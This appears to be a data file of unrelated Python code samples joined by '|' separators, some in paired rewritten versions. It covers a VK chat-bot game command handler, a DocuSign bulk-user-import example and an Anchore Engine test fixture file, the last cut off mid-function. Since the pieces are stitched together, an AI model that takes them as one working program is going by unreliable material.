                    # ---------- game commands (!) ----------
                    if event.text.startswith('!register'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=com.register(uid, userName, userLastName))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp["register"])
                    if event.text.startswith('!showinv'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=com.showInventory(uid))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp["showinv"])
                    if event.text.startswith('!unregister'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=com.delete(uid))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['unregister'])
                    if event.text.startswith('~secretkitty'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message="""
⊂_ヽ
\\ Λ_Λ
\( ˇωˇ)
⌒ヽ
/ へ\
/ / \\
レ ノ ヽ_つ
/ /
/ /|
( (ヽ
| |、\
| 丿 \ ⌒)
| | ) /
`ノ ) Lノ
(_/
""")
                    if event.text.startswith('!version'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=f"Account version: v.{ut.checkVersion(uid)}\nLatest version: v.{ver.latestVersion}")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['version'])
                    if event.text.startswith('!upgrade'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=ver.upgradeToLatest(uid))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['upgrade'])
                    if event.text.startswith('!enter'):
                        if len(event.text.split()) == 1:
                            if uid not in ingame:
                                ingame.append(uid)
                                com.playerToMap(uid)
                                vk.messages.send(random_id=0, user_id=uid, message="Account is now in session")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="U're already in session")
                        else:
                            # FIX: keyword was misspelled 'userid' (TypeError at runtime).
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp['enter'])
                    if event.text.startswith("!actlist"):
                        if uid in ingame:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message=com.actions(uid))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp["actlist"])
                        else:
                            vk.messages.send(random_id=27, user_id=uid, message="You must be in session")
                    if event.text.startswith("!move"):
                        if uid in ingame:
                            if len(event.text.split()) == 2:
                                direction = event.text.split()[1].lower()
                                if direction in ['right', 'left', 'up', 'down']:
                                    vk.messages.send(random_id=0, user_id=uid, message=sh.move(uid, direction))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message="Wrong direction, enter one of the 'right', 'left', 'up', 'down'")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("!open"):
                        if ut.checkVersion(uid) >= ver.latestVersion:
                            if uid in ingame:
                                if len(event.text.split()) == 1:
                                    vk.messages.send(random_id=0, user_id=uid, message=sh.openChest(uid))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=gamehelp['open'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
                    if event.text.startswith("!description"):
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=com.itemDesc(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['description'])
                    if event.text.startswith("!action"):
                        if uid in ingame:
                            if len(event.text.split()) == 2:
                                vk.messages.send(random_id=0, user_id=uid, message=sh.itemAction(uid, event.text.split()[1]))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp['action'])
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("!itemlist"):
                        if uid in ingame:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message=com.showShopList(uid))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp['itemlist'])
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("!buy"):
                        if ut.checkVersion(uid) >= ver.latestVersion:
                            if uid in ingame:
                                if len(event.text.split()) == 2:
                                    vk.messages.send(random_id=0, user_id=uid, message=com.buyItem(uid, event.text.split()[1]))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=gamehelp['buy'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
                    if event.text.startswith("!sell"):
                        if ut.checkVersion(uid) >= ver.latestVersion:
                            if uid in ingame:
                                if len(event.text.split()) == 2:
                                    vk.messages.send(random_id=0, user_id=uid, message=com.sellItem(uid, event.text.split()[1]))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=gamehelp['sell'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
                    if event.text.startswith("!tradeinv"):
                        if ut.checkVersion(uid) >= ver.latestVersion:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message=com.showTradeInventory(uid))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp['tradeinv'])
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
                    if event.text.startswith("!tileplayers"):
                        if uid in ingame:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message=com.playersOnTile(uid))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp['tileplayers'])
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    # ---------- social commands (/) ----------
                    if event.text.startswith("/pm"):
                        if uid in ingame:
                            if len(event.text.split()) > 2:
                                if int(event.text.split()[1]) not in ingame:
                                    vk.messages.send(random_id=0, user_id=uid, message="User isn't in game")
                                else:
                                    if ut.inFriends(uid, event.text.split()[1]):
                                        vk.messages.send(random_id=0, user_id=event.text.split()[1], message=f"{com.searchByID(uid)}(PM): {' '.join(event.text.split()[2:])}")
                                        # FIX: the sender's echo used to show the raw
                                        # list repr instead of the joined message text.
                                        vk.messages.send(random_id=0, user_id=uid, message=f"{com.searchByID(uid)}(PM): {' '.join(event.text.split()[2:])}")
                                    else:
                                        vk.messages.send(random_id=0, user_id=uid, message="This user isn't in your friendlist")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=sochelp['pm'])
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("/sendmoney"):
                        if len(event.text.split()) == 3:
                            vk.messages.send(random_id=0, user_id=uid, message=com.sendMoney(uid, event.text.split()[1], event.text.split()[2]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=sochelp['sendmoney'])
                    if event.text.startswith("/sendgift"):
                        if ut.isExist(uid):
                            if ut.checkVersion(uid) >= ver.latestVersion:
                                if len(event.text.split()) >= 3:
                                    # Gifts require save-format version 51+ on the receiver side.
                                    if ut.checkVersion(event.text.split()[1]) >= 51:
                                        vk.messages.send(random_id=0, user_id=uid, message=com.sendGift(uid, event.text.split()[1], event.text.split()[2], event.text.split()[3:]))
                                    else:
                                        vk.messages.send(random_id=0, user_id=uid, message="This account have version lower than 51 or not registered")
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=sochelp['sendgift'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command.")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Register first")
                    if event.text.startswith("/acceptgift"):
                        if ut.isExist(uid):
                            if ut.checkVersion(uid) >= ver.latestVersion:
                                if len(event.text.split()) == 2:
                                    vk.messages.send(random_id=0, user_id=uid, message=com.acceptGift(uid, event.text.split()[1]))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=sochelp['acceptgift'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command.")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Register first")
                    if event.text.startswith("/rejectgift"):
                        # FIX: was a bare 'isExist(uid)' (NameError); every other
                        # handler calls it through the 'ut' module.
                        if ut.isExist(uid):
                            if ut.checkVersion(uid) >= ver.latestVersion:
                                if len(event.text.split()) == 2:
                                    vk.messages.send(random_id=0, user_id=uid, message=com.rejectGift(uid, event.text.split()[1]))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=sochelp['rejectgift'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command.")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Register first")
                    if event.text.startswith("/chat"):
                        if uid in ingame:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message="You don't wrote the message")
                            else:
                                sh.chat(uid, event.text.split()[1:], False)
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("/me"):
                        if uid in ingame:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message="You don't wrote the message")
                            else:
                                # Third arg True = "action"-style message (/me).
                                sh.chat(uid, event.text.split()[1:], True)
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("/addfriend"):
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=com.addFriend(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=sochelp['addfriend'])
                    if event.text.startswith("/denyrequest"):
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=com.denyFriendRequest(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=sochelp['denyrequest'])
                    if event.text.startswith("/friendlist"):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=com.friendList(uid))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=sochelp['friendlist'])
                    if event.text.startswith("/removefriend"):
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=com.removeFriend(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=sochelp['removefriend'])
                    if event.text.startswith('!leave'):
                        if len(event.text.split()) == 1:
                            if uid in ingame:
                                ingame.remove(uid)
                                com.mapLeave(uid)
                                vk.messages.send(random_id=0, user_id=uid, message="Account removed from session")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Account isn't in session")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp['leave'])
                    if event.text.startswith("!save"):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=com.save(uid))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['save'])
                    if event.text.startswith('!whereami'):
                        if len(event.text.split()) == 1:
                            kurwa = com.getCoords(uid)
                            vk.messages.send(random_id=0, user_id=uid, message=f"You're on ({kurwa[0]};{kurwa[1]}) (x;y)")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['whereami'])
                    if event.text.startswith("~!!dropsession"):
                        if event.user_id == cid:
                            if ingame:
                                # FIX: iterate a copy — the body removes from ingame.
                                for i in list(ingame):
                                    ingame.remove(i)
                                    com.mapLeave(i)
                                    vk.messages.send(random_id=0, user_id=i, message="Your account has been forcibly removed from the session.")
                                    vk.messages.send(random_id=0, user_id=uid, message=f"{vk.users.get(user_ids=i)[0]['first_name']} был удалён из сессии")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message='Никого в сессии нет, еблан')
                    # ---------- help pages ----------
                    if event.text.split()[0] in ["~", "~help"]:
                        if len(event.text.split()) == 1:
                            msg = f"""These commands have the prefix "~":
help: {comhelp['help']}
osuhelp: {comhelp['osuhelp']}
gamehelp: {comhelp['gamehelp']}
socialhelp: {comhelp['socialhelp']}
ping: {comhelp['ping']}
uploadmany: {comhelp['uploadmany']}
"""
                            vk.messages.send(random_id=0, user_id=uid, message=msg)
                        elif len(event.text.split()) == 2:
                            # FIX: the original called int() on the argument
                            # unconditionally (ValueError for command names) and
                            # built the page-2 text without ever sending it.
                            if event.text.split()[1] in comhelp:
                                vk.messages.send(random_id=0, user_id=uid, message=comhelp[event.text.split()[1]])
                            elif event.text.split()[1].isdigit() and int(event.text.split()[1]) == 2:
                                msg = f"""~help page 2:
description: {comhelp['description']}
ruleofinternet: {comhelp['ruleofinternet']}
loli: {comhelp['loli']}
uploadone: {comhelp['upload']}
"""
                                vk.messages.send(random_id=0, user_id=uid, message=msg)
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~help")
                    if event.text.split()[0] in ["!", "~gamehelp", "!help"]:
                        if len(event.text.split()) == 1:
                            msg = f"""These commands have the prefix "!"
register: {gamehelp['register']}
unregister: {gamehelp['unregister']}
version: {gamehelp['version']}
upgrade: {gamehelp['upgrade']}
enter: {gamehelp['enter']}
leave: {gamehelp['leave']}
whereami: {gamehelp['whereami']}
move: {gamehelp['move']}
"""
                            vk.messages.send(random_id=0, user_id=uid, message=msg)
                        if len(event.text.split()) == 2:
                            # FIX: same int()-on-command-name crash as ~help above.
                            if event.text.split()[1] in gamehelp:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp[event.text.split()[1]])
                            elif event.text.split()[1].isdigit() and int(event.text.split()[1]) in [2, 3]:
                                if int(event.text.split()[1]) == 2:
                                    msg = f"""~gamehelp page 2:
save: {gamehelp['save']}
open: {gamehelp['open']}
showinv: {gamehelp['showinv']}
tradeinv: {gamehelp['tradeinv']}
action: {gamehelp['action']}
itemlist: {gamehelp['itemlist']}
buy: {gamehelp['buy']}
sell: {gamehelp['sell']}
"""
                                    vk.messages.send(random_id=0, user_id=uid, message=msg)
                                if int(event.text.split()[1]) == 3:
                                    msg = f"""~gamehelp page 3:
tileplayers: {gamehelp['tileplayers']}
"""
                                    vk.messages.send(random_id=0, user_id=uid, message=msg)
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~gamehelp")
                    if event.text.split()[0] in ["/", "~socialhelp", "/help"]:
                        if len(event.text.split()) == 1:
                            msg = f"""These commands have the prefix "/"
chat: {sochelp['chat']}
me: {sochelp['me']}
addfriend: {sochelp['addfriend']}
removefriend: {sochelp['removefriend']}
denyrequest: {sochelp['denyrequest']}
firendlist: {sochelp['friendlist']}
sendmoney: {sochelp['sendmoney']}
sendgift: {sochelp['sendgift']}
"""
                            vk.messages.send(random_id=0, user_id=uid, message=msg)
                        if len(event.text.split()) == 2:
                            if event.text.split()[1] in sochelp:
                                vk.messages.send(random_id=0, user_id=uid, message=sochelp[event.text.split()[1]])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~socialhelp")
                    if event.text.split()[0] in ["o!", "~osuhelp", "o!help"]:
                        if len(event.text.split()) == 1:
                            msg = f"""These commands have the prefix "o!"
pp: {osuhelp["pp"]}
register: {osuhelp["register"]}
change: {osuhelp["change"]}
recent: {osuhelp["recent"]}
me: {osuhelp["me"]}
changeavatar: {osuhelp["changeavatar"]}
"""
                            vk.messages.send(random_id=0, user_id=uid, message=msg)
                        if len(event.text.split()) == 2:
                            # "pp" gets the long-form help instead of the short entry.
                            if event.text.split()[1] == "pp":
                                vk.messages.send(random_id=0, user_id=uid, message=osuhelp["ppextended"])
                            elif event.text.split()[1] in osuhelp:
                                vk.messages.send(random_id=0, user_id=uid, message=osuhelp[event.text.split()[1]])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Commands is not found. Try ~osuhelp")
        # "Expected" failures restart the listen loop instead of crashing the bot.
        except UnboundLocalError as e:
            print(f"Catched a UnboundLocalError exception, restart: {e}")
            continue
        except TypeError as e:
            print(f"Catched a TypeError exception, restart: {e}")
            continue
        except NameError as e:
            print(f"Catched a NameError exception, restart: {e}")
            continue
        except KeyError as e:
            print(f"Catched a KeyError exception, restart: {e}")
            continue
        except ZeroDivisionError:
            pass
# Run the bot only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
|
from os import path
from docusign_admin.apis import BulkImportsApi
from flask import session, Response
import time
from app.admin.utils import create_admin_api_client, get_organization_id
from app.ds_config import DS_CONFIG
class Eg004AddUsersViaBulkImportController:
    """Docusign Admin API example: add users via a bulk CSV import."""

    @staticmethod
    def worker(self, request):
        """
        Create a user list import request and
        returns a list of pending and completed import requests:
        1. Create the import API object
        2. Getting a CSV file from a form and converting it to a string
        3. Creating an import API object
        4. Setting headers for creating bulk import request
        5. Returns the response from the create_bulk_import_add_users_request method
        """
        # Get organization ID
        organization_id = get_organization_id()

        # Create the export API object
        # Step 2 start
        api_client = create_admin_api_client(
            access_token=session["ds_access_token"]
        )
        # Step 2 end

        # Getting a CSV file from a form and saving it next to this module
        uploaded_file = request.files['csv_file']
        csv_folder_path = path.abspath(path.join(path.dirname(path.realpath(__file__)), "csv"))
        csv_file_path = path.join(csv_folder_path, "uploaded_file.csv")
        uploaded_file.save(csv_file_path)

        # Creating an import API object
        import_api = BulkImportsApi(api_client=api_client)

        # Setting headers for creating bulk import request
        header_name, header_value = "Content-Disposition", "filename=myfile.csv"
        api_client.set_default_header(header_name, header_value)

        # Returns the response from the create_bulk_import_add_users_request method
        # Step 3 start
        response = import_api.create_bulk_import_add_users_request(
            organization_id,
            csv_file_path
        )
        # Step 3 end

        # Save user list import id in a client session so check_status can poll it
        session['import_data_id'] = response.id
        return response

    @staticmethod
    def get_example_csv():
        """
        Creates an example of a CSV file, such as that needs to be sent to the Docusign server
        """
        # Returns an example of a CSV file.
        # FIX: the f-string fields used double quotes inside a double-quoted
        # f-string (f"{session["ds_account_id"]}"), which is a SyntaxError on
        # Python < 3.12; single quotes work on every supported version.
        return (
            "AccountID,UserName,UserEmail,PermissionSet\n"
            f"{session['ds_account_id']},Example User1,exampleuser1@example.com,DS Admin\n"
            f"{session['ds_account_id']},Example User2,exampleuser2@example.com,DS Admin\n"
        )

    @staticmethod
    def check_status():
        """Check request status"""
        organization_id = get_organization_id()
        api_client = create_admin_api_client(
            access_token=session["ds_access_token"]
        )

        # Creating an import API object
        import_api = BulkImportsApi(api_client=api_client)

        # Step 4 start
        import_results = import_api.get_bulk_user_import_request(organization_id, session['import_data_id'])
        # Step 4 end

        # Only a finished import is returned; None tells the caller to keep polling.
        if import_results.status == "completed":
            return import_results
        else:
            return None
| from os import path
from docusign_admin.apis import BulkImportsApi
from flask import session, Response
import time
from app.admin.utils import create_admin_api_client, get_organization_id
from app.ds_config import DS_CONFIG
class Eg004AddUsersViaBulkImportController:
    """Docusign Admin API example: add users in bulk from an uploaded CSV."""

    @staticmethod
    def worker(self, request):
        """Submit a bulk user-import request for the uploaded CSV.

        Saves the form's CSV next to this module, posts it through the
        Bulk Imports API, remembers the import id in the session, and
        returns the API response.
        """
        # Step 2 start
        api_client = create_admin_api_client(
            access_token=session["ds_access_token"]
        )
        # Step 2 end
        organization_id = get_organization_id()

        # Persist the uploaded CSV under ./csv relative to this module
        csv_upload = request.files['csv_file']
        target_dir = path.abspath(path.join(path.dirname(path.realpath(__file__)), "csv"))
        target_file = path.join(target_dir, "uploaded_file.csv")
        csv_upload.save(target_file)

        # The bulk-import endpoint needs a filename content-disposition header
        api_client.set_default_header("Content-Disposition", "filename=myfile.csv")
        import_api = BulkImportsApi(api_client=api_client)

        # Step 3 start
        response = import_api.create_bulk_import_add_users_request(
            organization_id,
            target_file
        )
        # Step 3 end

        # Remember the import id so check_status() can poll it later
        session['import_data_id'] = response.id
        return response

    @staticmethod
    def get_example_csv():
        """Return an example CSV payload in the format Docusign expects."""
        account = session['ds_account_id']
        rows = [
            "AccountID,UserName,UserEmail,PermissionSet",
            f"{account},Example User1,exampleuser1@example.com,DS Admin",
            f"{account},Example User2,exampleuser2@example.com,DS Admin",
        ]
        return "\n".join(rows) + "\n"

    @staticmethod
    def check_status():
        """Poll the pending import; return it once completed, else None."""
        api_client = create_admin_api_client(
            access_token=session["ds_access_token"]
        )
        organization_id = get_organization_id()
        import_api = BulkImportsApi(api_client=api_client)

        # Step 4 start
        import_results = import_api.get_bulk_user_import_request(organization_id, session['import_data_id'])
        # Step 4 end

        if import_results.status != "completed":
            return None
        return import_results
|
import json
import os
from dataclasses import dataclass
from os import path
from typing import Callable, Dict, Generator, Sequence
import pytest
import tests.functional.services.catalog.utils.api as catalog_api
import tests.functional.services.policy_engine.utils.api as policy_engine_api
from anchore_engine.db import session_scope
from anchore_engine.db.entities.catalog import CatalogImage, CatalogImageDocker
from anchore_engine.db.entities.policy_engine import (
CachedPolicyEvaluation,
CpeV2Vulnerability,
FeedMetadata,
FixedArtifact,
ImageVulnerabilitiesReport,
NvdV2Metadata,
Vulnerability,
)
from tests.functional.services.catalog.utils.utils import add_or_replace_document
from tests.functional.services.policy_engine.conftest import is_legacy_provider
from tests.functional.services.utils import http_utils
CURRENT_DIR = path.dirname(path.abspath(__file__))
ANALYSIS_FILES_DIR = path.join(CURRENT_DIR, "analysis_files")
SEED_FILE_DIR = path.join(CURRENT_DIR, "database_seed_files")
FEEDS_DATA_PATH_PREFIX = path.join("data", "v1", "service", "feeds")
EXPECTED_CONTENT = path.join(CURRENT_DIR, "expected_output")
@dataclass
class AnalysisFile:
    """Pairs an analysis-document filename with the digest of the image it describes."""

    # JSON analysis document name under ANALYSIS_FILES_DIR.
    filename: str
    # sha256 digest of the corresponding image.
    image_digest: str
ANALYSIS_FILES: Sequence[AnalysisFile] = [
AnalysisFile(
"alpine-test.json",
"sha256:80a31c3ce2e99c3691c27ac3b1753163214494e9b2ca07bfdccf29a5cca2bfbe",
),
AnalysisFile(
"debian-test.json",
"sha256:406413437f26223183d133ccc7186f24c827729e1b21adc7330dd43fcdc030b3",
),
AnalysisFile(
"centos-test.json",
"sha256:fe3ca35038008b0eac0fa4e686bd072c9430000ab7d7853001bde5f5b8ccf60c",
),
]
IMAGE_DIGEST_ID_MAP: Dict[str, str] = {}
@pytest.fixture(scope="package")
def add_catalog_documents(request) -> None:
    """
    Adds analyzer manifests to catalog. Deletes existing manifests and images if they exist.

    Also populates the module-level IMAGE_DIGEST_ID_MAP (digest -> image id)
    and registers a finalizer that removes everything it added.
    """
    for analysis_file in ANALYSIS_FILES:
        file_path = path.join(ANALYSIS_FILES_DIR, analysis_file.filename)
        with open(file_path, "r") as f:
            file_contents = f.read()
        analysis_document = json.loads(file_contents)
        # Upsert the analysis document into the catalog service.
        add_or_replace_document(
            "analysis_data", analysis_file.image_digest, analysis_document
        )
        image_id = analysis_document["document"][0]["image"]["imageId"]
        try:
            # Remove any stale copy of the image from the policy engine;
            # a 404 simply means it was not there.
            policy_engine_api.users.delete_image(image_id)
        except http_utils.RequestFailedError as err:
            if err.status_code != 404:
                raise err
        IMAGE_DIGEST_ID_MAP[analysis_file.image_digest] = image_id

    def remove_documents_and_image() -> None:
        """
        Cleanup, deletes added images and analyzer manifests.
        """
        for analysis_file in ANALYSIS_FILES:
            catalog_api.objects.delete_document(
                "analysis_data", analysis_file.image_digest
            )
            policy_engine_api.users.delete_image(
                IMAGE_DIGEST_ID_MAP[analysis_file.image_digest]
            )

    request.addfinalizer(remove_documents_and_image)
@pytest.fixture(scope="package")
def ingress_image(add_catalog_documents) -> Callable[[str], http_utils.APIResponse]:
    """
    Returns method that adds new image to policy engine for vulnerability scanning. Moved to fixture to reduce code duplication.

    :return: METHOD that calls ingress_image for the policy engine API with the appropriate catalog URL
    :rtype: Callable[[str], http_utils.APIResponse]
    """

    def _ingress_image(image_digest: str) -> http_utils.APIResponse:
        """
        Adds new image to policy engine for vulnerability scanning. Moved to fixture to reduce code duplication.

        :param image_digest: image digest of image to ingress
        :type image_digest: str
        :return: api response
        :rtype: http_utils.APIResponse
        """
        # Fix: single-quote the nested subscript — reusing the enclosing
        # quote character inside an f-string is a SyntaxError before 3.12.
        fetch_url = f"catalog://{http_utils.DEFAULT_API_CONF['ANCHORE_API_ACCOUNT']}/analysis_data/{image_digest}"
        image_id = IMAGE_DIGEST_ID_MAP[image_digest]
        return policy_engine_api.images.ingress_image(fetch_url, image_id)

    return _ingress_image
@pytest.fixture(scope="package")
def ingress_all_images(ingress_image) -> None:
    """Run the ingress helper once for every known analysis file."""
    for digest in (analysis.image_digest for analysis in ANALYSIS_FILES):
        ingress_image(digest)
@pytest.fixture(scope="session")
def image_digest_id_map() -> Dict[str, str]:
    """
    Expose the module-level digest -> id mapping to tests as a fixture.

    :return: lookup mapping of image_digest to image_id
    :rtype: Dict[str, str]
    """
    return IMAGE_DIGEST_ID_MAP
SEED_FILE_TO_DB_TABLE_MAP: Dict[str, Callable] = {
"feed_data_vulnerabilities.json": Vulnerability,
"feed_data_vulnerabilities_fixed_artifacts.json": FixedArtifact,
"feed_data_nvdv2_vulnerabilities.json": NvdV2Metadata,
"feed_data_cpev2_vulnerabilities.json": CpeV2Vulnerability,
"feeds.json": FeedMetadata,
"catalog_image.json": CatalogImage,
"catalog_image_docker.json": CatalogImageDocker,
}
CATALOG_FILES = ["catalog_image.json", "catalog_image_docker.json"]
VULN_DATA_FILES = [
"feed_data_vulnerabilities.json",
"feed_data_vulnerabilities_fixed_artifacts.json",
"feed_data_nvdv2_vulnerabilities.json",
"feed_data_cpev2_vulnerabilities.json",
"feeds.json",
]
SEED_FILE_TO_METADATA_MAP: Dict[str, str] = {
"feed_data_vulnerabilities.json": "metadata_json",
"feed_data_vulnerabilities_fixed_artifacts.json": "fix_metadata",
}
def load_seed_file_rows(file_name: str) -> Generator[Dict, None, None]:
    """
    Loads database seed files (json lines) and yields the json objects.

    For files listed in SEED_FILE_TO_METADATA_MAP the named column holds a
    JSON string; it is parsed into an object before the row is yielded.

    :param file_name: name of seed file to load
    :type file_name: str
    :return: generator yields json
    :rtype: Generator[Dict, None, None]
    """
    json_file = os.path.join(SEED_FILE_DIR, file_name)
    with open(json_file, "rb") as f:
        for line in f:
            # NOTE(review): assumes the seed dump stores escaped text —
            # confirm the dump format before changing this decode.
            linetext = line.decode("unicode_escape").strip()
            json_content = json.loads(linetext)
            if file_name in SEED_FILE_TO_METADATA_MAP:
                json_key = SEED_FILE_TO_METADATA_MAP[file_name]
                # Nested JSON column: parse it unless it is NULL in the dump.
                if json_content[json_key] is not None:
                    json_content[json_key] = json.loads(json_content[json_key])
            yield json_content
def _setup_vuln_data():
    """
    Loads database seed files and bulk saves all records directly to db
    """
    with session_scope() as db:
        all_records = []
        # Copy so the module-level CATALOG_FILES list is never mutated.
        files_to_seed = CATALOG_FILES.copy()
        # If legacy provider, add vuln data to be seeded to files
        # if grype provider, ensure the grypedb is synced
        if is_legacy_provider():
            files_to_seed += VULN_DATA_FILES
        else:
            policy_engine_api.feeds.feeds_sync(force_flush=True)
        # seed data to engine db
        for seed_file_name in files_to_seed:
            entry_cls = SEED_FILE_TO_DB_TABLE_MAP[seed_file_name]
            for db_entry in load_seed_file_rows(seed_file_name):
                all_records.append(entry_cls(**db_entry))
        db.bulk_save_objects(all_records)
        db.flush()
@pytest.fixture(scope="package", autouse=True)
def setup_vuln_data(
    request, set_env_vars, anchore_db, teardown_and_recreate_tables
) -> None:
    """
    Writes database seed file content to database. This allows us to ensure consistent vulnerability results (regardless of feed sync status).

    Recreates every table the seed data touches (plus the evaluation/report
    cache tables) before seeding, and registers a finalizer that recreates
    them again afterwards so the package leaves a clean database.
    """
    tablenames = [cls.__tablename__ for cls in SEED_FILE_TO_DB_TABLE_MAP.values()]
    tablenames.extend(
        [CachedPolicyEvaluation.__tablename__, ImageVulnerabilitiesReport.__tablename__]
    )
    teardown_and_recreate_tables(tablenames)
    _setup_vuln_data()
    request.addfinalizer(lambda: teardown_and_recreate_tables(tablenames))
| import json
import os
from dataclasses import dataclass
from os import path
from typing import Callable, Dict, Generator, Sequence
import pytest
import tests.functional.services.catalog.utils.api as catalog_api
import tests.functional.services.policy_engine.utils.api as policy_engine_api
from anchore_engine.db import session_scope
from anchore_engine.db.entities.catalog import CatalogImage, CatalogImageDocker
from anchore_engine.db.entities.policy_engine import (
CachedPolicyEvaluation,
CpeV2Vulnerability,
FeedMetadata,
FixedArtifact,
ImageVulnerabilitiesReport,
NvdV2Metadata,
Vulnerability,
)
from tests.functional.services.catalog.utils.utils import add_or_replace_document
from tests.functional.services.policy_engine.conftest import is_legacy_provider
from tests.functional.services.utils import http_utils
CURRENT_DIR = path.dirname(path.abspath(__file__))
ANALYSIS_FILES_DIR = path.join(CURRENT_DIR, "analysis_files")
SEED_FILE_DIR = path.join(CURRENT_DIR, "database_seed_files")
FEEDS_DATA_PATH_PREFIX = path.join("data", "v1", "service", "feeds")
EXPECTED_CONTENT = path.join(CURRENT_DIR, "expected_output")
@dataclass
class AnalysisFile:
filename: str
image_digest: str
ANALYSIS_FILES: Sequence[AnalysisFile] = [
AnalysisFile(
"alpine-test.json",
"sha256:80a31c3ce2e99c3691c27ac3b1753163214494e9b2ca07bfdccf29a5cca2bfbe",
),
AnalysisFile(
"debian-test.json",
"sha256:406413437f26223183d133ccc7186f24c827729e1b21adc7330dd43fcdc030b3",
),
AnalysisFile(
"centos-test.json",
"sha256:fe3ca35038008b0eac0fa4e686bd072c9430000ab7d7853001bde5f5b8ccf60c",
),
]
IMAGE_DIGEST_ID_MAP: Dict[str, str] = {}
@pytest.fixture(scope="package")
def add_catalog_documents(request) -> None:
"""
Adds analyzer manifests to catalog. Deletes existing manifests and images if they exist.
"""
for analysis_file in ANALYSIS_FILES:
